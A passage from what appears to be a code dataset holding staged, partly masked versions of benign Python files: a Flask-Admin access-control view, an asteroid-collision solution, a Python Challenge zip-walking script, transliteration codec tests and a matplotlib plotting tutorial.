Admin()\nadmin.add_view(AuthModel(Box, boxdb.session))\nadmin.add_view(AuthModel(Image, boxdb.session))\nadmin.add_view(UserModel(User, userdb.session))\nadmin.add_view(AuthModel(BoxQueue, boxdb.session))\n",
"step-5": "from flask_admin.contrib.sqla import ModelView\nfrom flask_admin import Admin\nfrom flask import abort\nimport flask_login\nimport logging\nfrom .models import User, sendUserMail, db as userdb\nfrom .box_models import Box, Image, db as boxdb\nfrom .box_queue import BoxQueue\n\nlogger = logging.getLogger('labboxmain')\n\n\nclass AuthModel(ModelView):\n def is_accessible(self):\n if not flask_login.current_user.is_authenticated:\n abort(400, \"Permission Denied\")\n return False\n\n now_user = flask_login.current_user\n if now_user.groupid != 0:\n abort(400, \"Permission Denied\")\n return False\n\n logger.warning('[Admin] ' + now_user.name)\n return True\n\n\nclass UserModel(AuthModel):\n column_list = [\"id\", \"name\", \"disable\", \"groupid\", \"email\", \"passtime\", \"quota\", \"use_quota\", \"password\"]\n\n column_descriptions = {\n 'password': \"Password(Left empty for forgot or newly create, It will send email to whom)\",\n 'passtime': \"The time for manually changing password(0 = never)\"\n }\n\n def on_model_change(self, form, model, is_created):\n if is_created:\n logger.warning(\"[Admin] Create for \" + model.email)\n sendUserMail(model, \"register\")\n return\n if not model.password:\n logger.warning(\"[Admin] Reset Password and sent to \" + model.email)\n sendUserMail(model, \"forgetpass\")\n return\n if not model.password.startswith(\"$6$\"):\n logger.warning(\"[Admin] Reset Password \" + model.email)\n model.setPassword(model.password)\n\n\nadmin = Admin()\nadmin.add_view(AuthModel(Box, boxdb.session))\nadmin.add_view(AuthModel(Image, boxdb.session))\nadmin.add_view(UserModel(User, userdb.session))\nadmin.add_view(AuthModel(BoxQueue, boxdb.session))\n",
"step-ids": [
2,
6,
7,
8,
9
]
}
|
[
2,
6,
7,
8,
9
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Solution:
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Solution:
def asteroidCollision(self, asteroids: List[int]) ->List[int]:
output = []
index = 0
for i in asteroids:
if len(output) == 0:
index = 0
if index == 0:
output.append(i)
index += 1
continue
elif output[-1] < 0 and i >= 0:
output.append(i)
elif output[-1] >= 0 and i >= 0:
output.append(i)
else:
append = True
while True:
if output[-1] < 0:
break
elif abs(output[-1]) == abs(i):
del output[-1]
append = False
break
elif abs(output[-1]) < abs(i):
del output[-1]
else:
append = False
break
if len(output) == 0:
break
if append:
output.append(i)
return output
|
flexible
|
{
"blob_id": "fef4749ce7b8668a5a138aa1245010866a85c853",
"index": 2485,
"step-1": "<mask token>\n",
"step-2": "class Solution:\n <mask token>\n",
"step-3": "class Solution:\n\n def asteroidCollision(self, asteroids: List[int]) ->List[int]:\n output = []\n index = 0\n for i in asteroids:\n if len(output) == 0:\n index = 0\n if index == 0:\n output.append(i)\n index += 1\n continue\n elif output[-1] < 0 and i >= 0:\n output.append(i)\n elif output[-1] >= 0 and i >= 0:\n output.append(i)\n else:\n append = True\n while True:\n if output[-1] < 0:\n break\n elif abs(output[-1]) == abs(i):\n del output[-1]\n append = False\n break\n elif abs(output[-1]) < abs(i):\n del output[-1]\n else:\n append = False\n break\n if len(output) == 0:\n break\n if append:\n output.append(i)\n return output\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import zipfile, re
f = zipfile.ZipFile("channel.zip")
num = '90052'
comments = []
while True:
content = f.read(num + ".txt").decode("utf-8")
print(content)
comments.append(f.getinfo(num + ".txt").comment.decode("utf-8"))
match = re.search("Next nothing is (\d+)", content)
if match == None:
break
num = match.group(1)
print("".join(comments))
url = "http://www.pythonchallenge.com/pc/def/hockey.html"
print(url)
# look at the letters that make the ascii art : they are : O makes h, x makes o, g makes k, e makes e, n makes y
print("http://www.pythonchallenge.com/pc/def/oxygen.html")
|
normal
|
{
"blob_id": "b883e63c70f3dfeac3294989fab93c1331b6329c",
"index": 7990,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile True:\n content = f.read(num + '.txt').decode('utf-8')\n print(content)\n comments.append(f.getinfo(num + '.txt').comment.decode('utf-8'))\n match = re.search('Next nothing is (\\\\d+)', content)\n if match == None:\n break\n num = match.group(1)\nprint(''.join(comments))\n<mask token>\nprint(url)\nprint('http://www.pythonchallenge.com/pc/def/oxygen.html')\n",
"step-3": "<mask token>\nf = zipfile.ZipFile('channel.zip')\nnum = '90052'\ncomments = []\nwhile True:\n content = f.read(num + '.txt').decode('utf-8')\n print(content)\n comments.append(f.getinfo(num + '.txt').comment.decode('utf-8'))\n match = re.search('Next nothing is (\\\\d+)', content)\n if match == None:\n break\n num = match.group(1)\nprint(''.join(comments))\nurl = 'http://www.pythonchallenge.com/pc/def/hockey.html'\nprint(url)\nprint('http://www.pythonchallenge.com/pc/def/oxygen.html')\n",
"step-4": "import zipfile, re\nf = zipfile.ZipFile('channel.zip')\nnum = '90052'\ncomments = []\nwhile True:\n content = f.read(num + '.txt').decode('utf-8')\n print(content)\n comments.append(f.getinfo(num + '.txt').comment.decode('utf-8'))\n match = re.search('Next nothing is (\\\\d+)', content)\n if match == None:\n break\n num = match.group(1)\nprint(''.join(comments))\nurl = 'http://www.pythonchallenge.com/pc/def/hockey.html'\nprint(url)\nprint('http://www.pythonchallenge.com/pc/def/oxygen.html')\n",
"step-5": "import zipfile, re\n\nf = zipfile.ZipFile(\"channel.zip\")\nnum = '90052'\ncomments = []\n\nwhile True:\n content = f.read(num + \".txt\").decode(\"utf-8\")\n print(content)\n comments.append(f.getinfo(num + \".txt\").comment.decode(\"utf-8\"))\n match = re.search(\"Next nothing is (\\d+)\", content)\n if match == None:\n break\n num = match.group(1)\nprint(\"\".join(comments))\n\nurl = \"http://www.pythonchallenge.com/pc/def/hockey.html\"\nprint(url)\n# look at the letters that make the ascii art : they are : O makes h, x makes o, g makes k, e makes e, n makes y\n\nprint(\"http://www.pythonchallenge.com/pc/def/oxygen.html\")",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def test_translit_long():
assert codecs.encode(data, 'translit/long') == u'GBP :-( woof meaaw'
def test_translit_short():
assert codecs.encode(data, 'translit/short') == u'GBP :-( woof meaw'
<|reserved_special_token_0|>
def test_translit_long_ascii():
data.encode('translit/long/ascii') == b'GBP :-( woof meaaw'
def test_translit_short_ascii():
data.encode('translit/short/ascii') == b'GBP :-( woof meaw'
def test_translit_one_ascii():
try:
codecs.encode(data, 'translit/one/ascii')
assert False
except UnicodeEncodeError:
assert True
assert codecs.encode(data, 'translit/one/ascii', 'replace'
) == b'? ? woof meaw'
<|reserved_special_token_0|>
def test_zero_width_space():
try:
char = codecs.encode(u'\u200b', 'translit/long')
assert char == u''
except TypeError:
assert False
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def test_translit_long():
assert codecs.encode(data, 'translit/long') == u'GBP :-( woof meaaw'
def test_translit_short():
assert codecs.encode(data, 'translit/short') == u'GBP :-( woof meaw'
def test_translit_one():
assert codecs.encode(data, 'translit/one') == u'£ ☹ woof meaw'
def test_translit_long_ascii():
data.encode('translit/long/ascii') == b'GBP :-( woof meaaw'
def test_translit_short_ascii():
data.encode('translit/short/ascii') == b'GBP :-( woof meaw'
def test_translit_one_ascii():
try:
codecs.encode(data, 'translit/one/ascii')
assert False
except UnicodeEncodeError:
assert True
assert codecs.encode(data, 'translit/one/ascii', 'replace'
) == b'? ? woof meaw'
def test_ascii_level_characters_remain():
assert codecs.encode(u"'", 'translit/long') == u"'"
def test_zero_width_space():
try:
char = codecs.encode(u'\u200b', 'translit/long')
assert char == u''
except TypeError:
assert False
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def test_default():
assert codecs.encode(data, 'transliterate') == u'GBP :-( woof meaaw'
def test_translit_long():
assert codecs.encode(data, 'translit/long') == u'GBP :-( woof meaaw'
def test_translit_short():
assert codecs.encode(data, 'translit/short') == u'GBP :-( woof meaw'
def test_translit_one():
assert codecs.encode(data, 'translit/one') == u'£ ☹ woof meaw'
def test_translit_long_ascii():
data.encode('translit/long/ascii') == b'GBP :-( woof meaaw'
def test_translit_short_ascii():
data.encode('translit/short/ascii') == b'GBP :-( woof meaw'
def test_translit_one_ascii():
try:
codecs.encode(data, 'translit/one/ascii')
assert False
except UnicodeEncodeError:
assert True
assert codecs.encode(data, 'translit/one/ascii', 'replace'
) == b'? ? woof meaw'
def test_ascii_level_characters_remain():
assert codecs.encode(u"'", 'translit/long') == u"'"
def test_zero_width_space():
try:
char = codecs.encode(u'\u200b', 'translit/long')
assert char == u''
except TypeError:
assert False
<|reserved_special_token_1|>
<|reserved_special_token_0|>
data = u'£ ☹ wøóf méåw'
def test_default():
assert codecs.encode(data, 'transliterate') == u'GBP :-( woof meaaw'
def test_translit_long():
assert codecs.encode(data, 'translit/long') == u'GBP :-( woof meaaw'
def test_translit_short():
assert codecs.encode(data, 'translit/short') == u'GBP :-( woof meaw'
def test_translit_one():
assert codecs.encode(data, 'translit/one') == u'£ ☹ woof meaw'
def test_translit_long_ascii():
data.encode('translit/long/ascii') == b'GBP :-( woof meaaw'
def test_translit_short_ascii():
data.encode('translit/short/ascii') == b'GBP :-( woof meaw'
def test_translit_one_ascii():
try:
codecs.encode(data, 'translit/one/ascii')
assert False
except UnicodeEncodeError:
assert True
assert codecs.encode(data, 'translit/one/ascii', 'replace'
) == b'? ? woof meaw'
def test_ascii_level_characters_remain():
assert codecs.encode(u"'", 'translit/long') == u"'"
def test_zero_width_space():
try:
char = codecs.encode(u'\u200b', 'translit/long')
assert char == u''
except TypeError:
assert False
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
"""Very basic codec tests.
:copyright: the translitcodec authors and developers, see AUTHORS.
:license: MIT, see LICENSE for more details.
"""
import codecs
import translitcodec
data = u'£ ☹ wøóf méåw'
def test_default():
assert codecs.encode(data, 'transliterate') == u'GBP :-( woof meaaw'
def test_translit_long():
assert codecs.encode(data, 'translit/long') == u'GBP :-( woof meaaw'
def test_translit_short():
assert codecs.encode(data, 'translit/short') == u'GBP :-( woof meaw'
def test_translit_one():
assert codecs.encode(data, 'translit/one') == u'\u00a3 \u2639 woof meaw'
def test_translit_long_ascii():
data.encode('translit/long/ascii') == b'GBP :-( woof meaaw'
def test_translit_short_ascii():
data.encode('translit/short/ascii') == b'GBP :-( woof meaw'
def test_translit_one_ascii():
try:
codecs.encode(data, 'translit/one/ascii')
assert False
except UnicodeEncodeError:
assert True
assert codecs.encode(data, 'translit/one/ascii', 'replace') == b'? ? woof meaw'
def test_ascii_level_characters_remain():
assert codecs.encode(u"'", 'translit/long') == u"'"
def test_zero_width_space():
try:
char = codecs.encode(u'\u200b', 'translit/long')
assert char == u''
except TypeError:
assert False
|
flexible
|
{
"blob_id": "426002bf900e23fd9b1d32c484350ac854228459",
"index": 2565,
"step-1": "<mask token>\n\n\ndef test_translit_long():\n assert codecs.encode(data, 'translit/long') == u'GBP :-( woof meaaw'\n\n\ndef test_translit_short():\n assert codecs.encode(data, 'translit/short') == u'GBP :-( woof meaw'\n\n\n<mask token>\n\n\ndef test_translit_long_ascii():\n data.encode('translit/long/ascii') == b'GBP :-( woof meaaw'\n\n\ndef test_translit_short_ascii():\n data.encode('translit/short/ascii') == b'GBP :-( woof meaw'\n\n\ndef test_translit_one_ascii():\n try:\n codecs.encode(data, 'translit/one/ascii')\n assert False\n except UnicodeEncodeError:\n assert True\n assert codecs.encode(data, 'translit/one/ascii', 'replace'\n ) == b'? ? woof meaw'\n\n\n<mask token>\n\n\ndef test_zero_width_space():\n try:\n char = codecs.encode(u'\\u200b', 'translit/long')\n assert char == u''\n except TypeError:\n assert False\n",
"step-2": "<mask token>\n\n\ndef test_translit_long():\n assert codecs.encode(data, 'translit/long') == u'GBP :-( woof meaaw'\n\n\ndef test_translit_short():\n assert codecs.encode(data, 'translit/short') == u'GBP :-( woof meaw'\n\n\ndef test_translit_one():\n assert codecs.encode(data, 'translit/one') == u'£ ☹ woof meaw'\n\n\ndef test_translit_long_ascii():\n data.encode('translit/long/ascii') == b'GBP :-( woof meaaw'\n\n\ndef test_translit_short_ascii():\n data.encode('translit/short/ascii') == b'GBP :-( woof meaw'\n\n\ndef test_translit_one_ascii():\n try:\n codecs.encode(data, 'translit/one/ascii')\n assert False\n except UnicodeEncodeError:\n assert True\n assert codecs.encode(data, 'translit/one/ascii', 'replace'\n ) == b'? ? woof meaw'\n\n\ndef test_ascii_level_characters_remain():\n assert codecs.encode(u\"'\", 'translit/long') == u\"'\"\n\n\ndef test_zero_width_space():\n try:\n char = codecs.encode(u'\\u200b', 'translit/long')\n assert char == u''\n except TypeError:\n assert False\n",
"step-3": "<mask token>\n\n\ndef test_default():\n assert codecs.encode(data, 'transliterate') == u'GBP :-( woof meaaw'\n\n\ndef test_translit_long():\n assert codecs.encode(data, 'translit/long') == u'GBP :-( woof meaaw'\n\n\ndef test_translit_short():\n assert codecs.encode(data, 'translit/short') == u'GBP :-( woof meaw'\n\n\ndef test_translit_one():\n assert codecs.encode(data, 'translit/one') == u'£ ☹ woof meaw'\n\n\ndef test_translit_long_ascii():\n data.encode('translit/long/ascii') == b'GBP :-( woof meaaw'\n\n\ndef test_translit_short_ascii():\n data.encode('translit/short/ascii') == b'GBP :-( woof meaw'\n\n\ndef test_translit_one_ascii():\n try:\n codecs.encode(data, 'translit/one/ascii')\n assert False\n except UnicodeEncodeError:\n assert True\n assert codecs.encode(data, 'translit/one/ascii', 'replace'\n ) == b'? ? woof meaw'\n\n\ndef test_ascii_level_characters_remain():\n assert codecs.encode(u\"'\", 'translit/long') == u\"'\"\n\n\ndef test_zero_width_space():\n try:\n char = codecs.encode(u'\\u200b', 'translit/long')\n assert char == u''\n except TypeError:\n assert False\n",
"step-4": "<mask token>\ndata = u'£ ☹ wøóf méåw'\n\n\ndef test_default():\n assert codecs.encode(data, 'transliterate') == u'GBP :-( woof meaaw'\n\n\ndef test_translit_long():\n assert codecs.encode(data, 'translit/long') == u'GBP :-( woof meaaw'\n\n\ndef test_translit_short():\n assert codecs.encode(data, 'translit/short') == u'GBP :-( woof meaw'\n\n\ndef test_translit_one():\n assert codecs.encode(data, 'translit/one') == u'£ ☹ woof meaw'\n\n\ndef test_translit_long_ascii():\n data.encode('translit/long/ascii') == b'GBP :-( woof meaaw'\n\n\ndef test_translit_short_ascii():\n data.encode('translit/short/ascii') == b'GBP :-( woof meaw'\n\n\ndef test_translit_one_ascii():\n try:\n codecs.encode(data, 'translit/one/ascii')\n assert False\n except UnicodeEncodeError:\n assert True\n assert codecs.encode(data, 'translit/one/ascii', 'replace'\n ) == b'? ? woof meaw'\n\n\ndef test_ascii_level_characters_remain():\n assert codecs.encode(u\"'\", 'translit/long') == u\"'\"\n\n\ndef test_zero_width_space():\n try:\n char = codecs.encode(u'\\u200b', 'translit/long')\n assert char == u''\n except TypeError:\n assert False\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"Very basic codec tests.\n\n:copyright: the translitcodec authors and developers, see AUTHORS.\n:license: MIT, see LICENSE for more details.\n\n\"\"\"\nimport codecs\nimport translitcodec\n\n\ndata = u'£ ☹ wøóf méåw'\n\ndef test_default():\n assert codecs.encode(data, 'transliterate') == u'GBP :-( woof meaaw'\n\ndef test_translit_long():\n assert codecs.encode(data, 'translit/long') == u'GBP :-( woof meaaw'\n\ndef test_translit_short():\n assert codecs.encode(data, 'translit/short') == u'GBP :-( woof meaw'\n\ndef test_translit_one():\n assert codecs.encode(data, 'translit/one') == u'\\u00a3 \\u2639 woof meaw'\n\ndef test_translit_long_ascii():\n data.encode('translit/long/ascii') == b'GBP :-( woof meaaw'\n\ndef test_translit_short_ascii():\n data.encode('translit/short/ascii') == b'GBP :-( woof meaw'\n\ndef test_translit_one_ascii():\n try:\n codecs.encode(data, 'translit/one/ascii')\n assert False\n except UnicodeEncodeError:\n assert True\n\n assert codecs.encode(data, 'translit/one/ascii', 'replace') == b'? ? woof meaw'\n\ndef test_ascii_level_characters_remain():\n assert codecs.encode(u\"'\", 'translit/long') == u\"'\"\n\ndef test_zero_width_space():\n try:\n char = codecs.encode(u'\\u200b', 'translit/long')\n assert char == u''\n except TypeError:\n assert False\n",
"step-ids": [
6,
8,
9,
10,
12
]
}
|
[
6,
8,
9,
10,
12
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
with plt.xkcd():
plt.title('XKCD style plot!!!')
plt.plot(X, C, label='cosine')
t = 2 * np.pi / 3
plt.scatter(t, np.cos(t), 50, color='blue')
plt.annotate('0.5 Here', xy=(t, np.cos(t)), xycoords='data', xytext=(-
90, -50), textcoords='offset points', fontsize=16, arrowprops=dict(
arrowstyle='->', linewidth=3, color='g'))
plt.show()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
X = np.linspace(-3, 3, 4096)
C = np.cos(X)
with plt.xkcd():
plt.title('XKCD style plot!!!')
plt.plot(X, C, label='cosine')
t = 2 * np.pi / 3
plt.scatter(t, np.cos(t), 50, color='blue')
plt.annotate('0.5 Here', xy=(t, np.cos(t)), xycoords='data', xytext=(-
90, -50), textcoords='offset points', fontsize=16, arrowprops=dict(
arrowstyle='->', linewidth=3, color='g'))
plt.show()
<|reserved_special_token_1|>
import numpy as np
import matplotlib.pyplot as plt
<|reserved_special_token_0|>
X = np.linspace(-3, 3, 4096)
C = np.cos(X)
with plt.xkcd():
plt.title('XKCD style plot!!!')
plt.plot(X, C, label='cosine')
t = 2 * np.pi / 3
plt.scatter(t, np.cos(t), 50, color='blue')
plt.annotate('0.5 Here', xy=(t, np.cos(t)), xycoords='data', xytext=(-
90, -50), textcoords='offset points', fontsize=16, arrowprops=dict(
arrowstyle='->', linewidth=3, color='g'))
plt.show()
<|reserved_special_token_1|>
import numpy as np
import matplotlib.pyplot as plt
##########################################
# line plot
#########################################
# x축 생략시 x축은 0, 1, 2, 3이 됨
"""
plt.plot([1, 4, 9, 16])
plt.show()
"""
# x축과 y축 지정
"""
plt.plot([10, 20, 30, 40], [1, 4, 9, 16])
plt.show()
"""
# 스타일지정
# 색깔, 마커, 선 순서로 지정함
# 색깔 : blue(b), green(g), red(r), cyan(c), magenta(m), yellow(y), block(k), white(w)
# 마커 : point(.), pixel(,), circle(o), triangle_down(v), triangle_up(^),
# triangle_left(<), triangle_right(>), tri_down(1), tri_up(2), tri_left(3),
# tri_right(4), square(s), pentagon(p), star(*), hexagon1(h),
# hexagon2(H), plus(+), x marker(x), diamond(D), thin_diamond(d)
# 선 : solid line(-), dashed line(--), dash-dot line(-.), dotted(:)
"""
plt.plot([1,4,9,16], 'bs:')
plt.show()
"""
# 기타스타일
# http://matplotlib.org/1.5.1/api/lines_api.html#matplotlib.lines.Line2D 참고
# color(c) : 선색깔
# linewidth(lw) : 선굵기
# linestyle(ls) : 선스타일
# marker : 마커종류
# markersize(ms) : 마커크기
# markeredgecolor(mec) : 마커 선 색깔
# markeredgewidth(mew) : 마커 선 굵기
# markerfacecolor(mfc) : 마커 내부 색깔
"""
plt.plot([1,4,9,16], c="b", lw=5, ls="--", marker="o", ms=15, mec="g", mew=5,
mfc="r")
plt.show()
"""
# 그림 범위지정
# xlim, ylim에서 최소, 최대값 지정
"""
plt.plot([1,4,9,16], c="b", lw=5, ls="--", marker="o", ms=15, mec="g", mew=5,
mfc="r")
plt.xlim(-10, 10)
plt.ylim(-10, 30)
plt.show()
"""
# 틱 설정
# 틱 : 플롯이나 차트에서 축상의 위치 표시 지점
# 틱라벨 : 틱 위에 써진 숫자 혹은 글자
# xticks, yticks로 틱라벨 지정
# 틱 라벨 문자열에는 $$사이에 LaTeX 수학 문자식 넣을수 있다
"""
X = np.linspace(-np.pi, np.pi, 256)
C = np.cos(X)
plt.plot(X, C)
plt.xticks([-np.pi, -np.pi/2, 0, np.pi/2, np.pi])
plt.yticks([-1, 0, +1])
plt.xticks([-np.pi, -np.pi/2, 0, np.pi/2, np.pi], [r'$-\pi$', r'$-\pi/2$',
'0', r'$+\pi/2$', r'$+\pi$'])
plt.yticks([-1, 0, +1], ["Low", "Zero", "High"])
plt.grid(False) # grid없애기
plt.show()
"""
# 여러개 선 그리기
# x, y, 스타일을 여러개 지정하면 됨
"""
t = np.arange(0., 5., 0.2)
plt.plot(t, t, 'r--', t, 0.5*t**2, 'bs:', t, 0.2*t**3, 'g^-')
plt.show()
"""
# 하나의 그림에 복수의 plot명령 적용 : 홀드
# hold(True) : 겹치기 시작
# hold(False) : 겹치기 종료
"""
plt.plot([1,4,9,16], c="b", lw=5, ls="--", marker="o", ms=15, mec="g", mew=5,
mfc="r")
plt.hold(True)
plt.plot([9,16,4,1], c="k", lw=3, ls=":", marker="s", ms=10, mec="m", mew=5,
mfc="c")
plt.hold(False)
plt.show()
"""
# 범례
# legent명령으로 범례 추가
# loc인수로 범례의 위치 지정
# loc : best(0), upper right(1), upper left(2), lower left(3),
# lower right(4), right(5), center left(6), center right(7)
# lower center(8), upper center(9), center(10)
"""
X = np.linspace(-np.pi, np.pi, 256)
C, S = np.cos(X), np.sin(X)
plt.plot(X, C, label="cosine")
plt.hold(True)
plt.plot(X, S, label="sine")
plt.legend(loc=5)
plt.show()
"""
# x축, y축 라벨, 타이틀
# xlabel, ylabel, title로 지정
"""
X = np.linspace(-np.pi, np.pi, 256)
C, S = np.cos(X), np.sin(X)
plt.plot(X, C, label="cosine")
plt.xlabel("time")
plt.ylabel("amplitude")
plt.title("Cosine Plot")
plt.show()
"""
# 부가설명
# annotate명령을 사용하여 그림내에 화살표를 포함한 부가 설명 넣을수 있음
"""
X = np.linspace(-np.pi, np.pi, 256)
S = np.sin(X)
plt.plot(X, S, label="sine")
plt.scatter([0], [0], color="r", linewidth=10)
plt.annotate(r'$(0,0)$', xy=(0, 0), xycoords='data', xytext=(-50, 50),
textcoords='offset points', fontsize=16,
arrowprops=dict(arrowstyle="->", linewidth=3, color="g"))
plt.show()
"""
# Figure [ Axes [ Axis] ] 의 구조이다
# Figure : 여러개의 윈도우를 띄우거나, 그림의 크기 지정시 사용
# plot사용시 자동으로 Figure를 생성하므로 명시적으로 생성할 필요는
# 없음
# figure객체를 얻으려면 gcf 명령 사용
"""
f1 = plt.figure(figsize=(100,2))
plt.plot(np.random.randn(100))
plt.show()
"""
"""
f1 = plt.figure(1)
plt.plot([1,2,3,4], 'ro:')
f2= plt.gcf()
print(f1, id(f1))
print(f2, id(f2))
plt.show()
"""
# Axes와 Subplot
# 하나의 윈도우(Figure)안에 여러개의 플롯을 배열하는 경우 각각의 플롯은
# Axes라고 불리는 객체에 속함
# subplot 명령으로 Axes객체를 생성, plot명령 사용시 자동으로 Axes를 생성함
# subplot은 그리드 형태의 Axes객체들을 생성
# Figure가 행렬(matrix)이고 Axes가 행렬의 원소라고 생각하면 됨.
# 위와 아래 두개의 플롯이 있는 경우 2X1행렬
# subplot은 3개의 인수를 가지고 처음 2개가 행렬 정의, 세번째가 위치 지정
"""
x1 = np.linspace(0.0, 5.0)
x2 = np.linspace(0.0, 2.0)
y1 = np.cos(2 * np.pi * x1) * np.exp(-x1)
y2 = np.cos(2 * np.pi * x2)
ax1 = plt.subplot(2, 1, 1)
plt.plot(x1, y1, 'yo-')
plt.title('A tale of 2 subplots')
plt.ylabel('Dampled oscillation')
print(ax1)
ax2 = plt.subplot(2, 1, 2)
plt.plot(x2, y2, 'r.-')
plt.xlabel('time (s)')
plt.ylabel('Undamped')
print(ax2)
plt.show()
"""
# subplot의 인수는 (2,2,1)를 줄여서 221로 표시 가능
"""
plt.subplot(221); plt.plot([1,2]); plt.title(1)
plt.subplot(222); plt.plot([1,2]); plt.title(2)
plt.subplot(223); plt.plot([1,2]); plt.title(3)
plt.subplot(224); plt.plot([1,2]); plt.title(4)
plt.tight_layout()
plt.show()
"""
# xkcd 스타일
X = np.linspace(-3, 3, 4096)
C = np.cos(X)
with plt.xkcd():
plt.title('XKCD style plot!!!')
plt.plot(X, C, label="cosine")
t = 2 * np.pi / 3
plt.scatter(t, np.cos(t), 50, color='blue')
plt.annotate(r'0.5 Here', xy=(t, np.cos(t)), xycoords='data', xytext=(-90,
-50), textcoords='offset points', fontsize=16,
arrowprops=dict(arrowstyle="->", linewidth=3, color="g"))
plt.show()
|
flexible
|
{
"blob_id": "89ffb2da456d2edf15fde8adc01615a277c6caa1",
"index": 8522,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith plt.xkcd():\n plt.title('XKCD style plot!!!')\n plt.plot(X, C, label='cosine')\n t = 2 * np.pi / 3\n plt.scatter(t, np.cos(t), 50, color='blue')\n plt.annotate('0.5 Here', xy=(t, np.cos(t)), xycoords='data', xytext=(-\n 90, -50), textcoords='offset points', fontsize=16, arrowprops=dict(\n arrowstyle='->', linewidth=3, color='g'))\nplt.show()\n",
"step-3": "<mask token>\nX = np.linspace(-3, 3, 4096)\nC = np.cos(X)\nwith plt.xkcd():\n plt.title('XKCD style plot!!!')\n plt.plot(X, C, label='cosine')\n t = 2 * np.pi / 3\n plt.scatter(t, np.cos(t), 50, color='blue')\n plt.annotate('0.5 Here', xy=(t, np.cos(t)), xycoords='data', xytext=(-\n 90, -50), textcoords='offset points', fontsize=16, arrowprops=dict(\n arrowstyle='->', linewidth=3, color='g'))\nplt.show()\n",
"step-4": "import numpy as np\nimport matplotlib.pyplot as plt\n<mask token>\nX = np.linspace(-3, 3, 4096)\nC = np.cos(X)\nwith plt.xkcd():\n plt.title('XKCD style plot!!!')\n plt.plot(X, C, label='cosine')\n t = 2 * np.pi / 3\n plt.scatter(t, np.cos(t), 50, color='blue')\n plt.annotate('0.5 Here', xy=(t, np.cos(t)), xycoords='data', xytext=(-\n 90, -50), textcoords='offset points', fontsize=16, arrowprops=dict(\n arrowstyle='->', linewidth=3, color='g'))\nplt.show()\n",
"step-5": "import numpy as np\nimport matplotlib.pyplot as plt\n\n##########################################\n# line plot\n#########################################\n\n# x축 생략시 x축은 0, 1, 2, 3이 됨\n\"\"\"\nplt.plot([1, 4, 9, 16])\nplt.show()\n\"\"\"\n\n\n# x축과 y축 지정\n\"\"\"\nplt.plot([10, 20, 30, 40], [1, 4, 9, 16])\nplt.show()\n\"\"\"\n\n# 스타일지정\n# 색깔, 마커, 선 순서로 지정함\n# 색깔 : blue(b), green(g), red(r), cyan(c), magenta(m), yellow(y), block(k), white(w)\n# 마커 : point(.), pixel(,), circle(o), triangle_down(v), triangle_up(^),\n# triangle_left(<), triangle_right(>), tri_down(1), tri_up(2), tri_left(3),\n# tri_right(4), square(s), pentagon(p), star(*), hexagon1(h),\n# hexagon2(H), plus(+), x marker(x), diamond(D), thin_diamond(d)\n# 선 : solid line(-), dashed line(--), dash-dot line(-.), dotted(:)\n\"\"\"\nplt.plot([1,4,9,16], 'bs:')\nplt.show()\n\"\"\"\n\n\n# 기타스타일\n# http://matplotlib.org/1.5.1/api/lines_api.html#matplotlib.lines.Line2D 참고\n# color(c) : 선색깔\n# linewidth(lw) : 선굵기\n# linestyle(ls) : 선스타일\n# marker : 마커종류\n# markersize(ms) : 마커크기\n# markeredgecolor(mec) : 마커 선 색깔\n# markeredgewidth(mew) : 마커 선 굵기\n# markerfacecolor(mfc) : 마커 내부 색깔\n\"\"\"\nplt.plot([1,4,9,16], c=\"b\", lw=5, ls=\"--\", marker=\"o\", ms=15, mec=\"g\", mew=5,\n mfc=\"r\")\nplt.show()\n\"\"\"\n\n\n# 그림 범위지정\n# xlim, ylim에서 최소, 최대값 지정\n\"\"\"\nplt.plot([1,4,9,16], c=\"b\", lw=5, ls=\"--\", marker=\"o\", ms=15, mec=\"g\", mew=5,\n mfc=\"r\")\nplt.xlim(-10, 10)\nplt.ylim(-10, 30)\nplt.show()\n\"\"\"\n\n# 틱 설정\n# 틱 : 플롯이나 차트에서 축상의 위치 표시 지점\n# 틱라벨 : 틱 위에 써진 숫자 혹은 글자\n# xticks, yticks로 틱라벨 지정\n# 틱 라벨 문자열에는 $$사이에 LaTeX 수학 문자식 넣을수 있다\n\"\"\"\nX = np.linspace(-np.pi, np.pi, 256)\nC = np.cos(X)\nplt.plot(X, C)\nplt.xticks([-np.pi, -np.pi/2, 0, np.pi/2, np.pi])\nplt.yticks([-1, 0, +1])\nplt.xticks([-np.pi, -np.pi/2, 0, np.pi/2, np.pi], [r'$-\\pi$', r'$-\\pi/2$',\n'0', r'$+\\pi/2$', r'$+\\pi$'])\nplt.yticks([-1, 0, +1], [\"Low\", \"Zero\", \"High\"])\nplt.grid(False) # grid없애기\nplt.show()\n\"\"\"\n\n\n# 여러개 선 그리기\n# x, y, 스타일을 여러개 지정하면 됨\n\"\"\"\nt = np.arange(0., 5., 0.2)\nplt.plot(t, t, 'r--', t, 0.5*t**2, 'bs:', t, 0.2*t**3, 'g^-')\nplt.show()\n\"\"\"\n\n\n# 하나의 그림에 복수의 plot명령 적용 : 홀드\n# hold(True) : 겹치기 시작\n# hold(False) : 겹치기 종료\n\"\"\"\nplt.plot([1,4,9,16], c=\"b\", lw=5, ls=\"--\", marker=\"o\", ms=15, mec=\"g\", mew=5,\n mfc=\"r\")\nplt.hold(True)\nplt.plot([9,16,4,1], c=\"k\", lw=3, ls=\":\", marker=\"s\", ms=10, mec=\"m\", mew=5,\n mfc=\"c\")\nplt.hold(False)\nplt.show()\n\"\"\"\n\n\n# 범례\n# legent명령으로 범례 추가\n# loc인수로 범례의 위치 지정\n# loc : best(0), upper right(1), upper left(2), lower left(3),\n# lower right(4), right(5), center left(6), center right(7)\n# lower center(8), upper center(9), center(10)\n\"\"\"\nX = np.linspace(-np.pi, np.pi, 256)\nC, S = np.cos(X), np.sin(X)\nplt.plot(X, C, label=\"cosine\")\nplt.hold(True)\nplt.plot(X, S, 